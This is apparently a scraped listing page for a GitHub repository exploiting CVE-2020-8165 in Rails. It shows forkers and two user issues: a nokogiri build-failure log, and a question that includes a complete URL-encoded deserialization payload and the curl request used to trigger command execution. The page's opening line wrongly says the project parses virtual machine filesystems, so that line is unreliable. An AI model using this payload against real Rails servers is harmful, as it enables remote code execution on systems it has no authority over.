This project parse all virtual machines format and filesystem's.
cve-2020-8165's Introduction
cve-2020-8165's People
Forkers
5l1v3r1 m3g4byt3 fdlucifer s-kustm hexrom wahost070 aimanpoji shad0wcry mohinparamasivam python4004 faated bbriggs johnboomi wiinew fostanecve-2020-8165's Issues
An error occurred while installing nokogiri (1.10.9), and Bundler cannot continue.
I tried to install and received the following error message:
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.
current directory:
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb
extconf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.
Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in try_do': The compiler failed to generate an executable file. (RuntimeError) You have to install development tools first. from /usr/lib/ruby/2.7.0/mkmf.rb:597:in
block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in with_werror' from /usr/lib/ruby/2.7.0/mkmf.rb:597:in
try_compile'
from extconf.rb:138:in nokogiri_try_compile' from extconf.rb:162:in
block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in with_cflags' from extconf.rb:161:in
add_cflags'
from extconf.rb:416:in `
To see why this extension failed to compile, please check the mkmf.log which can
be found here:
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/mkmf.log
extconf failed, exit code 1
Gem files will remain installed in
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9 for
inspection.
Results logged to
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/gem_make.out
An error occurred while installing nokogiri (1.10.9), and Bundler
cannot continue.
Make sure that gem install nokogiri -v '1.10.9' --source 'https://rubygems.org/'
succeeds before bundling.
In Gemfile:
rails was resolved to 5.2.3, which depends on
actioncable was resolved to 5.2.3, which depends on
actionpack was resolved to 5.2.3, which depends on
actionview was resolved to 5.2.3, which depends on
rails-dom-testing was resolved to 2.0.3, which depends on
nokogiri
gem_make.out OUTPUT:
current directory: /root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokog
iri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb ext
conf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.
Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in try_do': The compiler failed to generate an executable file. (RuntimeError) You have to install development tools first. from /usr/lib/ruby/2.7.0/mkmf.rb:597:in
block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in with_werror' from /usr/lib/ruby/2.7.0/mkmf.rb:597:in
try_compile'
from extconf.rb:138:in nokogiri_try_compile' from extconf.rb:162:in
block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in with_cflags' from extconf.rb:161:in
add_cflags'
from extconf.rb:416:in `
To see why this extension failed to compile, please check the mkmf.log which can
be found here:
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7
.0/nokogiri-1.10.9/mkmf.log
extconf failed, exit code 1
mkmf.log OUTPUT:
"x86_64-linux-gnu-gcc -o conftest -I/usr/include/x86_64-linux-gnu/ruby-2.7.0 -I/
usr/include/ruby-2.7.0/ruby/backward -I/usr/include/ruby-2.7.0 -I. -Wdate-time -
D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=/build/ruby2.7-PnoFQD/ruby2.7-2.7
.2=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC conftest.c
-L. -L/usr/lib/x86_64-linux-gnu -L. -Wl,-z,relro -Wl,-z,now -fstack-protector-
strong -rdynamic -Wl,-export-dynamic -lruby-2.7 -lm -lc "
checked program was:
/* begin */
1: #include "ruby.h"
2:
3: int main(int argc, char *argv)
4: {
5: return !!argv[argc];
6: }
/ end */
Any assistance would be appreciated.
Cannot execute other commands?
Hi,
I am able to use the provided exploit code to create the /tmp/rce file, by running the curl
command twice.
However, I cannot modify the code to create other files or run other commands.
I changed the code touch /tmp/rce
to touch /tmp/rce2
and ran the rest of the Ruby code in the same way.
From this, I generated the payload %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
And ran the request curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T'
twice.
However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as rm
, echo 'x' > /tmp/rce
, or ping
.
Do you have any advice on why this is not working?
Thank you!
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.